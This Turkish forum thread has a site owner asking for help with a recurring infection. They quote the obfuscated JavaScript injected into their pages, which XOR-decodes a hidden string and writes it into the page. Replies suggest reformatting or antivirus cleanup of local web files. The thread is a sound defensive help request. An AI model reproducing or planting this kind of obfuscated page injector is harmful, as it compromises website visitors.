![]() |
|
|
||||
|
http://www.gizligizli.net daha önce de belirtmiştim. nereden bulaştığını bilemediğim bi virüs bulaştı. kodu kaldırdım fakat tekrar girmiş.
<script language="JavaScript">e = '0x00' + '46';str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE% A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE %A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E 8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8% E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA %F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%F B";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script> şöyle bir kod atiyor. siliyorum bir gün sonra tekrar geliyor arkadaşlar buna nasil bi çözüm bulucam ?
|||
|
Servera bulaştıysa yapılacak pek birşey yok. Tek çözüm format.
|
alakası yok... bu arada ben arkadaşın hosting sponsoruyum yapılacak tek şey kaspersky indirip virüs taraması yaptıkdan (diğer antivirüs programları bu virüsde pek işe yaramaz zaten büyük ihtimallede bulamazda)sonra bilgisayarınızdaki tüm html asp htm vs. uzantılı web dosyalarından bu kodu kaldırıp tekrar ftpnize atmak. format vs. vs. uzun işler ne kadar atarsanız atın ipiniz kayıtlıdır tekrar kapacaksınız... bu arada arkadaşa birisi ftpdeki bütün dosyaları indir virüs taraması yap sonra yine at dedi diye yazıyorum bu bilgiyi çok komikti :P
|
Alıntı:
kaspersky'den mi yapacam bunu
|
Alıntı:
bu daha komik
|
Xp nin geri yüklemesinden bahsediliyor.Evet bilgisayarda geri yükleme işe yaramıyordu yardım dosylalarında "..geri yükleemeyi durdurun sonra ..." deniyordu .İng iyi olmadığından yanlış çevirdim diye yapmamıştım sonra format attım.
Demek geri yüklemeyi virüslerde kullanıyor Vaybe!
|
teşekkürler arkadaşım. denicem..
| Seçenekler | |
| Stil | |
|
|